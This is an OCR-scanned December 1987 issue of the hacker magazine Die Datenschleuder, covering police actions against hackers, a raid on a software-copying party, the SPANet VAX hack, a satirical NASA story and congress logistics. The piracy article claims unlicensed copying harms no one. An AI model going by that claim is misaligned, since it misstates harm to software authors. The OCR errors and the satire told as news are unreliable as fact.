“staatlich geprüfter Hacker“ (Hausdurchsuchung)
erhöht sich, so daß auch diese Auszeichnung an
elitärem Wert verliert. Die Unterhaltungsshow ver¬
liert irgendwann ihren Reiz und es beginnt die zweite
Phase.
Da wage ich die Prognose, daß für einige Freaks das
erste Techtelmechtel mit dem BKA zu seriösen Ar¬
beitsverträgen führt. Da werden sich dann andere
fürchterlich drüber aufregen - aber niemand wird
Sialengdjieuiec
diese Entwicklung aufhalten können. Warum auch:
an der prinzipiellen Situation wird sich nichts än¬
dern. Selbst wenn B.H.P. und CCC samt Umfeld mit
dem geballten Know-How Unterabteilungen des
BKA wären - die Aufklärungsquote würde sich nur
unerheblich steigern. Die Informationstechnik - und
der Scheiß, den man damit anstellen kann - läßt sich
nicht kontrollieren. Das BKA kann sich also die
psychologische Unterwanderang schenken - am En¬
de ist es mit viel Aufwand genau so schlau wie
vorher. Sie werden wissen, daß sie nichts wissen
können. Und das könnte man dann “institutionelle
Weisheit“ nennen.
Daß man beim BKA trotzdem Bewährtes auspro¬
bieren wird, ist klar. Jeder muß seine Fehler selber
machen - auch eine Institution. Aber es wird sich in
der Abteilung “Computerkrirainalität“ des BKA in
den nächsten Jahren die Erkenntnis durchsetzen
müssen, daß eine Spaltung der Szene in “kriminelle“
und “artige" Hacker fatale Folgen hat. Schafft man
auf diesem Wege Computer-Terroristen, wird man
die Geister die man rief nicht mehr los. Es wird
aussichtslos sein, logische Bomben in irgendwel¬
chen Rechnern der Welt finden zu wollen. Diese
Entwicklung kriminalistisch anzugehen, kommt
dem Versuch gleich, den Ozean mit einem Fingerhut
aus.schöpfen zu wollen.
Sicherheit durch absolute Offenheit
Es gibt zwei Möglichkeiten, mit den kommenden
Problemen umzugehen: Eine intelligente und eine
weniger intelligente. Die weniger intelligente wird
gerade vom BKA praktizien. Die intelligente wäre,
wenn das BKA mit den Hackern an einem Strang
ziehen würde - und diese in der Forderung nach
Offenen Netzen unterstützen würde. Es ist manch¬
mal vernünftig, auf die zu hören, die mehr Erfah¬
rungen im Umgang mit der Zukunft haben.
Wenn die Zukunft Perspektive haben soll, muß man
sich von bestimmten Denkstrukturen, vom Freund-
Feind-Schema, verabschieden - auf beiden Seiten.
Das wird für manche ein schmerzhafter Prozeß wer¬
den. Es bleibt, will man den Informationskrieg ver¬
meiden, nurdieForderungnach Offenen Netzen. Wo
Information frei ist, braucht nichts versteckt zu wer¬
den, der Psychokrieg um die Verstecke entfällt, denn
wir brauchen niemanden, der in vermeintlichen Ver¬
stecken schnüffeln muß. Sicherheit durch absolute
Sfl(cn8d;fciiker
Offenheit beinhaltet gleichzeitig die für jede De¬
mokratie notwendige Übersicht über die laufenden
Entwicklungen. Freie Daten, lautet die Forderung
für die Zukunft - und das ist gemeint, wenn Hacker
die maschinenlesbare Regierung fordern.
Der Effekt dieses Hacker-Grundsatzes trat bereits
1967 am Massachuetts Institute of Technologie
(MIT) zu Tage. Als ein Projektleiter am MIT die
Einführung von individuellen Paßwörtern anord¬
nete, brachten die Hackerdas neue Programm immer
wieder zum Absturz und schrieben ihrerseits ein
Programm, bei dem der Benutzer lediglich den Be¬
fehl “kill System“ einzugeben brauchte - schon blieb
der Rechner einfach stehen. Ein paar Neugierige
probierten diesen Befehl aus, doch als sie erlebten,
daß der Rechner tatsächlich abstürzte, machte nie¬
mand mehr von dieser Möglichkeit gebrauch.
Der Nachhilfe-Unterricht für’s BKA sollte deshalb
weniger auf technischer Ebene laufen, sondern als
Seminar für Zukunftsfragen gestaltet werden.
iwi 280145 0kl 87 BEREICH CLINCH OFFEN
IMPRESSUM
Die Datenschleuder Numero 24 - Dezember
1987
Das wissenschaftliche Fachblatt für Daten¬
reisende
D-2000 Hamburg 20
Schwenckestrasse 85
Geonet: Geol:Chaos-Team
CLINCH : Chaos-Team
Btx : *ChaosJf
tel: 040-4903757 / 040-483752
Herausgeber und ViSdP: Reinhard Schrutzki
Mitarbeiter (u.a.):
DDT, A. Eichler, P. Franck, H. Grusel, Herwart
Holland-Moritz, jwi, KS, M. Kuehn, Andy M.-M.,
J. Nicolas, padeluun, Poetronic, S. Stahl, S. Wer-
nery.TAM, JACUi£ , ChaiS^
Nachdruck für nichtgewerbliche Zwecke bei Quel¬
lenangabe erlaubt.
Unter EreignisDruck im Selbstverlag.
Seite ^
Seite 5
Bit-Napping
padeluun und Rena Tangens von der Galerie Art
d’Ameublement in Bielefeld sind dem Compu-
ferfreund bereits durch ihre PUBLIC DOMAIN-
Veranstallungen im Bunker Ulmen wall bekannt.
Anläßlich der von ihnen im vergangenen Monat
durchgeführten BIT-N APPING-PARTY-Vl.O
sah die Kripo - scharf gemacht von einer großen
Softwarefirma • sich veranlaßt, eine Haus¬
durchsuchung vorzunehmen.
“Raubkopieren“. Welch unschönes Wort. Niemand
raubt. Eigentlich heißt es “Softwaretauseh". Der
Artikel von Cäsar/Stöpsel in der letzten DATEN¬
SCHLEUDER und die Hausdurchsuchung in Bie¬
lefeld erfordern eine Stellungnahme.
Schon immer bestaunte ich die Diskettenkästen bei
den Kids. Hunderte von Disketten, jede drei Mark
teuer - mal mehr - mal weniger. “Hast Du...“, meine
naive Frage. “Kann sein, falls ich's nicht gelöscht
habe.“ Fast immer die gleiche Antwon. Und bei
“Zeig mal was“ der Griff in die Kiste. Diskette
einlegen und - ja, und dann kommt ein INTRO. Die
Cracker haben in 'zweistündiger Arbeit’ mal eben
das Unmögliche möglich gemacht. Da stellt der
ATARI plötzlich 46000 (?) Farben gleichzeitig auf
dem Schirm dar, der AMIGA bringt ein fünfminU-
tiges gesampeltes Musikstück 'rüber' und der gute
alte C64 wird bis über den Bildschirmrand hinaus
mit formatfüllenden höchstauflösenden Farbgrafi¬
ken aufgepeppt.
Ich weiß, daß das alles technisch unmöglich ist und
vor meinen Augen passiert es. Und. Was hat das mit
’Raubkopien’ zu tun? Die kommen dann hinter dem
INTRO. Und bevor die KINGS OFT- oder ARIOLA-
£in(cn?d)Icuber
Programme auch nur die geringste Chance haben,
gesehen zu werden, sind sie auch schon ausge-
schaliet und das nächste INTRO wird eingelegt. Hier
und da schaut man sich auch mal ein Programm an.
BECKER-TEXT gefällt WORDPLUS-Benutzem
recht gut. Da ich schon lange keine Computerzei¬
tungen mehr kaufe, hätte ich von derExistenzdieses
Programmes nie erfahren. Wenn nicht, ja, wenn
nicht in Bielefeld die BIT-NAPPING-PARTY-Vl .0
stattgefunden hätte.
Festnahme und 'Frühstück danach’
Schon der Titel der Veranstaltung sagt alles. Schlaf¬
säcke und Rechner sollten milgebracht werden, ge¬
rüchteweise verbreitete sich die Nachricht bis hinein
in die größeren Softwarehäuser; daß da fäl¬
schungssichere und durchnumerierte Einladungs¬
karten unterwegs waren. Die Bit-Napping-Party für
sich war ein voller Erfolg. Wir lachten selber Uber
unsere Sicherheitsvorkehrungen, ln Bielefeld mußte
sich der Gast erst einmal bei der Anlaufadresse
melden, und von don aus wurden die einzelnen
Gäste zum Ot des Geschehens geschickt.
Das eigentlich Erstaunliche spielte sich (wie wir erst
'beim Frühstück danach’ erfuhren) kurz nach dem
letzten Einlaßschluß draußen auf der Straße vor der
Anlaufadresse ab. Ein junger Herr, der leider etwas
zu spät kam und niemanden mehr antraf, spürte eine
Hand auf der Schulter und wurde das erste Mai in
seinem Leben 'vorläufig festgenommen’. Er wurde
mit auf s Revier genommen und in seinen Taschen
fand man neben einigen Disketten ('Alles Origi¬
nalsoftware’, grinste einer der Beamten) auch - na¬
türlich, denn ohne diese kein Einlaß - eine Einla¬
dungskarte. Wo er diese her habe. Nun und das stand
ja groß und breit drauf: Art d’Ameublement. Die
Leute mit der MODERNSTEN KUNST hatten zur
’CrackerFetc’ geladen.
Der junge Mann, der Montags beim Frühstück von
seiner Festnahme berichtete, erzählte Unglaubli¬
ches: Videokameras lagen da rum und Spiegelre¬
flexkameras und mindestens sechs Kripo-Beamie
wären daran beteiligt gewesen und hätten ihm er¬
zählt, daß 'eine Anzeige von außerhalb vorliegen
würde’ und daß ihre Taktik gewesen wäre, reinzu¬
stürmen und erst mal alles zu vilmen und zu foto¬
grafieren. (Allerdings mußte der Türsteher immer
erst mal den Schlüssel holen gehen...). Die Erzäh¬
lungen klangen seltsam. Wir erzählten die Ge¬
schichte gerne weiter, aberhaben sie eigentlich nicht
so recht geglaubt.
Seite 6
Drei Tage später, Punkt 14 Uhr (da beginnen unsere
galeristischcn Geschäftszeiten) standen drei Herren
im Laden. Ja, richtig, die Kripo. Und da standen sie
nun mit Haussuchungsbefehl für Laden, Privat¬
wohnung, Keller, Speicher und Auto. Ob wir mit der
Hausdurchsuchung einverstanden seien, eine Frage,
die man stets nur verneinen kann. Der Bitte um
Aushändigung der Liste mit Namen und Adressen
aller Gäste konnten wir nicht nachkommen, denn -
selbst wenn sie existieren würde - könnte doch
schließlich niemand von uns erwarten, daß wir sie
bei uns aufbewahren würden. Dieser Argumentation
konnten sich auch die Beamten nicht verschließen.
Ganz heiße Leute
Sie waren freundlich, und freundlich zeigten wir
Ihnen den Computer (wir waren gerade dabei, Rech¬
nungen zu schreiben), dasDiskettcnlager, und schon
nach 10 Minuten war unserAnwalt zur Stelle. Dann
wurde grob oberflächlich die Geschäftskorrespon-
denz durchgcwühlt und anschließend erzählte uns
der Beamte noch, daß der 'Anzeiger' noch zum
Besten gegeben hätte, daß wir 'ganz heiße Leute’
seien. Wir hätten auch den (ich kann das Wort nicht
mehr hören) NASA-Hack mitgemacht.
Wieso erzählt jemand so etwas? Und die Antwort
war sämtlichen Paneien klar: Die 'Bullen' sollten
'heiß gemacht werden, damit sie sich auf jeden Fall
der Bit-Napping-Party annehmen. Auch die Polizi¬
sten fühlten sich von den Software-Firmen regel¬
recht mißbraucht. Nett wurde der Dialog, als Rena
dem Leiter der Aktion einen Aufkleber vom FoBuD
e.V. anbot und der Herr nur trocken antwortete, daß
er gerade überlegen würde, ob er ALLE mitnehmen
sollte. Er unterließ es. Alles, was beschlagnahmt
wurde, waren etwa 60 Originale mit Seriennummem
und etwa ebenso viele Raubkopien; Der Rest der
Einladungskarten und übriggebliebene fotokopierte
Stadlpläne. Für die Besucher von außerhalb, damit
sic den Ort des Geschehens leichter finden. Natürlich
ohne Kreuzchen an der betreffenden Stelle.
Es ist anscheinend nicht die einzige Veranstaltung,
die ’hochgenonunen’ werden sollte. Wir hatten
Glück, daß wir uns aus den (uns selbst unsinnig
erscheinenden) Sicherheitsvorkehrungen einen
Sport gemacht haben. Ohne sie wäre die fröhliche
Party sehr viel eher beendet gewesen, ein Zentral¬
computer (oder Karteikasten?!) mit einer Menge
überflüssiger Pcrsonaldatcn gefüttert worden und
einige Eltern wären vermutlich aus allen Wolken
gefallen.
Seite 7
Aber einen Fehler sollten 'Veranstalter' und 'Gäste'
von solchen Partys nicht machen: Kriminalroman
spielen. Nur weil es unangenehm ist, wenn die Ex¬
ekutive in den Disketten herumschnüffelt, muß man
sich nicht einigeln. Im Gegenteil. Je offener und
aufrechter ein jeder zu seinen Handlungen steht,
desto weniger lassen sich die Hacker und Cracker
und Kids und/oder wie sie alle heißen, in die Kri¬
minalität drängen. FREE FLOW OF INFORMA¬
TION ist mehr als nur 'Hacker-Ethik'.
Ich möchte hier an dieser Stelle nur wenig über
'Profis' verlauten lassen. (Bezüglich der Diskussion
Geld/nicht Geld für Raubsoftware). Der ’Profi-
raubkopierer’ hat einen Job mit 60 Wochen-
Arbeitsstunden, der sich in seiner Eintönigkeit kaum
von einem Fabrikjob unterscheidet. Manche Men¬
schen brauchen halt neben dem neuesten Video und
dem abgefahrensten Drink auch stets die neueste
Version von MacMüHomatPlusTM. Ich sehe dies als
ein Suchtproblem an. das sich aus dem Wesen des
Mediums selbst ergibt. Diese Sucht ist nur über den
- auch professionellen - Graumarkt zu befriedigen;
bei einem Durchschnittseinkommen von ix-Mark-
fuffzig Taschengeld.
Geschadet wird tatsächlich niemandem, denn kaufen
würde trotzdem niemand das Zeug. Die Verkaufs¬
zahlen der Ballerspielchen sind - so haben Befra¬
gungen des Fachhandels ergeben - immens hoch.
Verhungern wird niemand in den Softwarefirmen.
Höchstens die freien Programmierer, die sich die
Programme für viel zu wenig Geld abkaufen lassen.
Das Suchtproblem, das die Jagd nach der immer
neuesten Software darstclit, sehe ich selber als re¬
lativ harmlos an. Es erledigt sich eines Tage.s von
selbst.
Ein jeder stellt fest, daß diese Welt keine aus¬
schließlich elektronische ist und daß es unmöglich
ist, ein Programm in seine Freundin einzugeben und
daß es vielleicht an der Zeit wäre, erst einmal spre¬
chen zu lernen. Die kopierten Spiele machen eh’
schon seit langem keinen Spaß mehr. Sie werden
lediglich kopiert und weitergegeben. Für Telepathie
gibi’s keine FTZ-Nummer, und Bier schmeckt in
Gesellschaft immer am Besten.
Weitermachen.
Art d’Ameublement
Rena Tangens & padeluun
CLINCHIPOETRONIC/PADELUUNfZB.11.87/20:28/8522
£afcn*if)Iaikcr
AufgeDECt
Editorial des DECKBLATT Nr. 11 ,1987
“Das darf doch gar nicht wahr sein, mag sich
manch einer gedacht haben, als bekannt w'urde,
daH eine kleine Gruppe deutscher Hacker weit
über 100Rechnerimwissenschaftlichen SPANet
geknackt haben, darunter so “kapitale“ Systeme
wie die der NASA oder des Kernforschungszen¬
trums CERN in Genf. Das darf doch nicht wahr
sein, wird man vor allem bei DEC gedacht haben.
Denn sämtliche geknackten Rechner waren VA-
Xen unter VMS. Und gerade VAXyVMS hatte
DEC doch immer als eines der sichersten Be¬
triebssysteme überhaupt bezeichnet. Eine Ein¬
schätzung, die übrigens auch das amerikanische
Verteidigungsministerium teilte.
Warder“Superhack“ ein Jux? Eine kri minel le Hand¬
lung? Oder war es gar eine ausgewachsene
Spionage-Affäre, wie der britische Guardian arg¬
wöhnte? “Super-Stoff für Ost-Agenten“, so meldet
auch “Bild“, sei den Hackern in die Finger geraten.
John le Caire läßt grüßen. Spionage war das sicher
nicht - dazu haben diese Hacker einfach nicht das
Format. Ganz im Gegenteil, sagt auch der Chaos
Computer Club. Sie wollten auf Sicherheitslücken
aufmerksam machen. Soein schönes Motiv. Schade,
daß sie es erst bekanntgegeben haben, nachdem sie
sowieso entdeckt worden waren.
Lassen wir uns doch nichts vormachen. Da haben
junge Leute mit Computer und Modem gespielt -
hier und da auch mal einen Rechner geknackt. Dann
kam iiberdie elektronische Post ein neues Spielzeug.
Kein Schaukelpferd, ein trojanisches. Solch neues
Spielzeug will ausprobiert sein, und das SPANet bot
sich als Spielwiese geradezu an.
Es muß die DEC-Leutc hart getroffen haben. Nie
werden sie müde, die Offenheit ihrer VAX-
Architekiur zu betonen. Und nun kommt die Be¬
stätigung ausgerechnet aus der falschen Ecke. Aber
DEC ist selber schuld. Nicht unbedingt wegen des
Fehlers im Betriebssystem - das sollte zwar nicht
passieren, aber welches große Software-Produkt ist
schon vollkommen fehlerfrei? Vorwerfen muß man
DEC vielmehr, daß der Hersteller auch nach Be¬
kanntwerden des Fehlers - und das ist immerhin
schon einige Monate her - nicht sofort reagierte.
SitticnSdikuba
Schuld sind aber auch die System-Betreiber selbst.
Hundenprozentige Sicherheit ab Werk ist eine Uto¬
pie. Es ist auch und vor allem Aufgabe der System-
Manager, für die Sicherheit ihrer Rechner zu sorgen.
Und diese Pflicht wird gerade in Forschungsein¬
richtungen oft aufs Gröbste vernachlässigt. Forscher
wollen forschen, und daher ist es nicht selten, daß ein
Student das System managt - so nebenbei. Es soll
auch heute noch Rechner unter VMS 4.4 und 4.5
geben, auf denen die DEC-Patches nicht tnstallien
sind. Wenn ich einem Einbrecher meinen Haus¬
schlüssel gebe, darf ich mich nicht wundem, wenn
anschließend etwa.s fehlt.
Mittlerweile hat DEC den Fehler behoben. Die not¬
wendigen Patches sind ausgeliefert, eine neue VMS-
Version steht ebenfalls seil einiger Zeit zur Verfü¬
gung. VMS ist wieder eines der sichersten Be¬
triebssysteme der Welt. Das war es tatsächlich auch
vorher schon, die Einschätzungen von DEC und dem
Dod (Department of Defense) waren so falsch nicht.
Es gibt kein Betriebssystem, in das Hacker nicht
eindringen könnten, wenn .sie es nur wirklich wollen.
Daß es gerade DEC getroffen hat, hat eigentlich nur
einen Grund; Die anderen Betriebssysteme waren
den Hackern nicht interessant genug. Außerdem - wo
findet man sonst noch so ausgedehnte Netze? Inso¬
fern war der Superhack ein Kompliment für DEC.
Hat er DEC denn nun eigentlich geschadet? Ein
wenig am Image hat er schon gekratzt - das ist halt
so eine dumme Eigenart negativer Schlagzeilen.
Aber schauen wir uns doch einmal einen der sensi¬
belsten Sensoren an - Wall Street. Der Aktienkurs
von DEC hat nicht den geringsten Rückschlag hin¬
nehmen müssen. Im Gegenteil.“
Thomas Hertel (stellvertretender Chefredakteur)
Seite 8
CCC und NASA
Viel Rauch um nichts
(SZ) - Neulich saßen sie wieder zusammen, die
Jungs vom Chaos-Computer-Club in Hamburg,
spezialisiert auf Einbrüche in Elektronenhirne
aller Art,und hackten und zapflen/drahteten und
kabelten/schalteten und walteten.
Einer las gähnend Volkszählungsdaten eines Stati¬
stischen Landesamtes, der zweite schmuggelte mit¬
tels eines Ostberliner Redaktionssystems das Won
Glasnosi in den Aufmacherdes Neuen Deutschland
vom nächsten Tag, der dritte versuchte die Ketchup-
Formel eines internationalen Hamburger-Konzems
zu finden. Da rief der vierte: “Mööönsch, ich bin bei
der NASA!“ Die anderen sprangen herbei, und rich¬
tig, da stand auf dem Bildschirm; “Guten Tag, hier
ist die amerikanische Raumfahnbehörde.“ Zwar
handelte es sich bloß, wie sich herausstellte, um den
elektronischen Abfallkorb der NASA, in den man
vorgedrungen war, aber man wei ja, da es die Ab¬
fallprodukte der Weltraumforschung in sich haben.
“1) Teflonpfanne“ stand da, “2) Schwerkraftunab¬
hängiger Kugel Schreiber“. Dann kam es: “3) Rauch¬
freie Zigarette“.
Dem folgenden Text war zu entnehmen, daß sich in
den Siebziger Jahren eine Forschungsgruppe mit der
Frage beschäftigt hatte, wie man Astronauten auch
whrend eines Welüaumfluges das Rauchen ermög¬
lichen könnte. Die Zigarette dürfte, so hieß es, er¬
stens keine Asche hinlerlasscn, weil in der Kapsel
kein Platz für Aschenbecher sei, und sie dürfte zwei¬
tens keinen Rauch entwickeln, denn der Blick auf die
Sterne müsse frei bleiben. Ein geheimer For¬
schungsauftrag wurde an die amerikanische Ziga¬
rettenfirma R.J. Reynolds vergeben, deren Techni¬
kern das unmöglich Erscheinende gelang: Tabak
ersetzten sie durch Tabakextrakt, Geschmacksstof¬
fe, Glyzerin und ähnliche Leckereien, ein Kohle¬
stück an derSpitze sorgtefür glühend heiße Luft zum
Einatmen. Leider verschwand die Erfindung dann
im NASA-Computer, weil der amerikanische Ge¬
heimdienst herausgekriegi hatte, da die Russen
Nichtraucher als Astronauten einsetzten, um sich
einen Vorsprung im All zu verschaffen.
Nun ist die Sache doch an die Öffentlichkeit ge¬
kommen. ALs die NASA entdeckte, daß Hamburger
Chaoten bei ihr eingedrungen waren, informierte sie
sofort den Vorstandsvorsitzenden von R.J. Rey-
Seite 9
Wirtschaftsdaten
Digital Equipment Corporation
Digital Equipment GmbH
Freischützstrasse 91
8000 München 81
Tel.: 089/9591-0
Telex 5 215 780
Btx 20898
Telefax 089/9591-1010
DEC in Zahlen (Alle Angaben in Mio DM)
1983
1984
1985
1986
Teilkonzemumsau
461
616
913
1092
Veründenjng in %
-t-6
+34
+47
+20
Beschäfiigie
1490
1886
2456
305S
BilanMumme
233
367
485
533
Grundkapital
8,
20
40
85
Rücklagen
12
-
6
6
Sachanlagen
32
38
62
115
Beteiligungen
-
■
Liquide Mittel
10
8
17
19
Personalaufwand
101
117
156
211
Investitionen
17
25
53
91
Jahrcsühcrschuß
1.8
4.7
7,5
10,3
nolds, der unverzüglich eine Pressekonferenz ein¬
berief und bekanntgab, seine Firma wolle mit einer
rauchlosen Zigarette den von militanten Nichtrau¬
chern bedrängten US-Markt erobern. Die NASA
erwähnte er nicht. Das war am Montag, gerade ein
Tag, bevor die Hacker aus Flamburg mit ihrer Pres¬
sekonferenz so weit waren. Wer sollte ihnen die
Wahrheit noch glauben? Sie berichteten also bloß
allgemein von einer geknackten NASA-Datenbank
Namens Space Physics Analysis Network und er¬
wähnten den Abfallkorb nicht. Aber Lesern, welche
die Zusammenhänge hinter den Nachrichten des
Tages suchen, verraten wir mehr: Es ist kein Zufall,
daß - ebenfalls am Montag dieser Woche - das
Batelle-Instilut (Frankfurt) etwas hektisch die Er¬
findung einer schmelzfesten Schokolade für Kinder
bekanntgab.
Quelle; Süddeutsche Zeitung, 17.9.87
SättcnNiicukcr
Die internationale Hackerparty
Chaos Communication Congress 1987
Zum viertem Mal veranstaltet der CCC in Ham¬
burg seinen Communication Congress. Wie
schon in den vergangenen Jahren treffen sich
zwischen den Feiertagen Daten reisende, Tele¬
fonfreaks, Informationspfadfinder, Funkma-
niacs, Netzflaneure, Bitniks, Hacker und Hack¬
sen zur Internationalen Hackerpariy. Entgegen
anderslautenden Veröffentlichungen startet der
Congress am Sonntag dem 27. Dezember um 10
Uhr und endet am Montag dem 2S. Dezember
gegen 21'Uhr. Veranstaltungsort ist, wie in den
vergangenen Jahren, das Eidelstedter Bürger¬
haus, Elbgaustraße 12, in Hamburg Eidelstedt.
“Offene Netze - Jetzt!“
Der Congress steht dieses Jahr unter dem Motto;
“Offene Netze - Jetzt“. Weiterhin geht es um “Hac¬
ker und Staat“ (Hintergründe der Nasa-Story, Pa¬
nikmanagement beim CCC, Bundespolizei undHac-
ker, sowie einer Diskussion über Perspektiven der
Hacker-Szene). Juristische Workshops erläutern die
“Tarife fürs Hacken“. Weiterhin Infos über Ver¬
schlüsselung und Verschleierang. Vorgestellt wird
auch ein neues Konzept zur Vernetzung von Mail¬
boxsystemen (BtxNet). Der genaue Congressfaht-
plan wird erst Mitte Dezember vorliegen und dann
sogleich über die Netze verbreitet. Spannung und
Aktion werden jedoch garantiert.
Wegen der sehr schlechten Terminlage - kurz nach
Weihnachten - beginnt der Aufbau am Congress-Ort
schon am Donnerstag dem 24. Dezember. Am Vor¬
mittags des Heiligen Abend wird die
Telekommunikations-Infrastruktur (internes
Telefon- und Datennetz) verlegt. Ami. und 2. Weih¬
nachtsfeiertag wird der Congress eingerichtet. Hel¬
fer und Referenten können ab dem 24. Dezember am
Tagungsort eintreffen. Auswänige Gäste werden ab
Samstag (2. Weihnachtsfeiertag) eingelassen und
erhalten abends ihre Schlafplätze zugewiesen. Über¬
nachtungsmöglichkeiten werden von Samstag bis
Montag bereitgehalten.
Der elgendlcli« Lubyrtnlhnjrstagmiif
> 0
©BlcnS^lculJcr
Wie in den vergangenen Jahren bietet die
DATENSCHLEUDER-Redaktion angehenden Re¬
dakteuren Zugriff auf das Redaktionsarchiv und un¬
seren Schnellkopierer. Neu ist eine eigenständige
Congressredaktion, in der aktuelle Meldungen für
die öffentlichen und internen Netze erstellt werden.
In diesem Jahr wird der CCC erstmals mehrfach
täglich auch mit einem eigenen Fernsehsender (A-
mateurfunkfemsehen) vom Congress berichten. Aus
der Congress-Mailbox können Daheimgebliebene
die aktuellen Meldungen vom Congress abfragen
(Eventuell können die Meldungen auch Uber Btx
abgerufen werden).
Im Hack-Center stehen mehrere Telefonleitungen
bereit, um einen freien Zugang zu den internatio¬
nalen Datennetzen zu ermöglichen. Für Frühstück
und Kaffee bietet das Chaos- Cafe wieder seine Dien¬
ste an. Desweiteren finden Referate, Diskussionen
und Demonstrationen in den Workshops im Theater
und den Konferenzräumen statt.
Der Congress wanzt
Wegen der technischen Demonstrationen gelten die
Räumlichkeiten als “Elektrisches Labor“, zu dem
nur Unterwiesene Zutritt haben. Jeder Teilnehmer
hat sich bei örtlichen Funkamateuren / Elektronikern
etc. vorher fachkundig zu machen. Das Fotografie¬
ren sowie das Aufzeichnen mittels Ton- und Bild¬
trägem ist, wie in den vergangenen Jahren, aus Da¬
tenschutzgründen untersagt. Ira Rahmen der Pres¬
searbeit werden TV-Teams anwesend sein. Nicht
ausgeschlossen werden kann, daß staatliche Dienst¬
stellen den Congress als Datenregister verwenden
möchten. AusdiesemGrund sollte JederTeilnehmer
dementsprechend vorsichtig sein. Die Projektlei¬
tung wird täglich eine Überprüfung auf Verwanzung
vornehmen und ein Frühwarnsystem für größere
Polizeiaktionen vorbereiten. Für alle Fälle werden
mehrere Anwälte der Veranstaltung beiwohnen.
Alle Teilnehmer benötigen dieses Jahr ein Paßfoto
für den Congress-Ausweis. Die Congress-Ausweise
haben sich bei der letztjährigen Bombendrohung
und der anschließenden Räumung als äußerst nütz¬
lich erwiesen. Mindeijährige erhalten gekenn¬
zeichnete Congress-Ausweise und müssen die Räu¬
me bis 22 Uhr verlassen (Jugendschutzgesetz).
Die Teilnahmegebühr beträgt für Mitglieder
(CCCcV) und Mindeijährige DM 15,-, für Presse¬
vertreter DM 50,- und für alle anderen DM 20,-. Die
Beträge können zukünftig nur so günstig gestaltet
werden, wenn nicht wie im letzten Jahr Telefone und
Modems im Wert von über DM 2000,- verschwin¬
den!
Wir rechnen dieses Jahr mit 400 bis 600 Teilneh¬
merinnen. Eine rechtzeitige Voranmeldung sichert
auch bei Überfüllung noch den Einlaß. Voranmel¬
dung durch Einzahlung auf Posigiro (BLZ200 100
20) Konto 599090-201 für den CCCeV. Bitte den
Beleg mitbringen!
Schlafplätze sollte man sich privat besorgen. Wer es
sich leisten kann, dem sei ein preiswertes Zimmer
auf der Reeperbahn (da gibts nachts noch was zu
beißen) empfohlen. Für Ausnahmefälle hat der CCC
mehrere Nachtlager (Schlafsack) von Samstag bis
Montag in petto.
Ab Heiligabend ist die Congress-Mailbox unter der
Rufummer 040-5704065 (38nld) erreichbar. Die
Congressredaktion beantwonet Fragen zum inhalt¬
lichen Geschehen unter der Rufnummer 040-
5705696. Die Projektleitung und Vermittlung ist
unter 040-5705708 erreichbar.
Weitere Informationen können im Vorfeld über die
CLINCH-Mailbox 040-6323517 (38nlD) abgeru¬
fen werden. Die CCC Geschäftstelle ist unter 040-
4903757 erreichbar. Für Referenten und Organisa¬
tionsfragen ist die Btx-Redaktion unter 040-483752
(VOICEÜ!) erreichbar.
Hier nochmal die wichtigsten Telefondaten:
Vorbereitung:
CCC-Geschäftsstelle: 040-490 37 57
Btx-Redaktion (Congressorganisation): 040-48
37 52
CLINCH-Mailbox (38nlD); 040-632 35 17
Durchführung:
Congressmailbox (38nlD): 040-570 40 65
Congressredaktion (Pressestelle): 040-570 56 96
Projektleilung und Vermittlung: 040-570 57 08
Der Chaos Computer Club hofft auf rege Teilnahme,
so daß wie in den vergangenen Jahren Communi¬
cation und Information im Vordergrund der Ver¬
anstaltung stehen.
S.Wernery 291914 Nov 87 BEREICH RED CON¬
GRESS CCC87
mmr ofa mmR
PAR.T TVO s SUkVlVAL
Sxi(ciiSii;Icuktr
Seite 10
Seite 11
Congressredaktion
Die CCC Pressestelle am Congress
Hamburg (CCC87) - Die Congress-Redaktion
hat für dieses Jahr eine umfangreiche Berich¬
terstattung vorbereitet. Vom 26. bis einschlie߬
lich 28. Dezember werden wir aktuelle Meldun¬
gen, Hintergrundberichte, Features, Dokumen¬
tationen, den Pressespiegel und bei Bedarf In¬
terviews anbielen. Dieser neue Congress-Scrvice
dient in erster Linie zur internen Kommunika¬
tion, wird darüber hinaus aber auch für Presse,
Funk und Fernsehen produziert. Zudem soll ge¬
testet werden, inwieweit es gelingt, für die Dauer
des Congresses eine eigene Medien-Infrastruktur
aufzubauen und zu beliefern. Mit größeren Ka¬
tastrophen ist zu rechnen. Zur Verbreitung ste¬
hen folgende Medien zur Verfügung:
- Congiess-Zeitung
- aktueller Tagesdien.st (?)
- ggf. Bildschirmtext
• Congess-Mailbox
- Mailboxdrucker (Hardcopies für Pinwand)
- Amateurfunkfernsehen
Cungress-Zeitung
Die Congress-Zeitung ist auch in diesem Jahr eine
Sonderausgabe der DATENSCHLEUDER. Wir
werden uns bemühen, die Congress-Zeitung wäh¬
rend der laufenden Veranstaltung zu produzieren.
Die Congress-Zeitung wird die interessantesten
Meldungen aus dem allgemeinen Nachrichtenan¬
gebot enthalten.
aktueller Tagesdienst
Sofern notwendig und technisch zu realisieren, wer¬
den zwei mal täglich Kurzmeldungen mit einer Zu¬
sammenfassung der wichtigsten Ereignisse als DIN-
A-4 Fotokopie unter den Congress-Teilnehmern
verteilt. Beabsichtigt sind bis zu acht Kurzmeldun¬
gen a neun Zeilen. Darüber hinaus sollen bei Bedarf
auch die CCC87-Pressemitteilungcn verteilt wer¬
den.
ggf. Bildschirmtext
Eine Auswahl des aktuellen Tagesdienstes, aufbe-
reilet mit zusätzlichen Informationen werden ggf. im
Bildschirmtext angeboten. Der Btx-Dienst wird zu¬
sätzlich auf der Congress-Mailbox im Breil Chaos
unter der Betreffkennung CCC87A>tx eingespielt.
Congress-Mailbox
Die Congress-Mailbox ist unter der Rufnummer
040/-5 je iC^Szu erreichen. Sie ist zum einen die
Schnittstelle nach außen und gleichzeitig das elek¬
tronische Infomiationsmedium des Congresses. Es
ist ein stündliche ablaufendes Intermail zwischen
FIDO-Net, Congress-Mailbox und anderen Netzen
vorgesehen. Mit diesem Service soll versucht wer¬
den, von außen kommende Informationen direkt in
laufende Veranstaltungen einzubringen. Box-
Beireiber im FfDO-Net sollten sich überlegen, ob Sie
für die Zeit des Congresses ein Brett CCC87 ein¬
richten wollen. Aus Kapazitalsgründen ist eine
Übersetzung ins Englische nicht möglich. Wer in¬
teressante Informationen übersetzen und auf die In¬
ternationale Ebene hieven will, sei dazu herzlich
aufgefordert. Sämtliche Meldungen haben Net¬
zwerkfreigabe.
Mailbox-Drucker (Hardcopies für Pinnwand)
Sämtliche von der Congress-Redaktion produzierte
Meldungen, sowie alle Informationen die über FIDO
und andere Netze ankommen, werden als Hardcopy
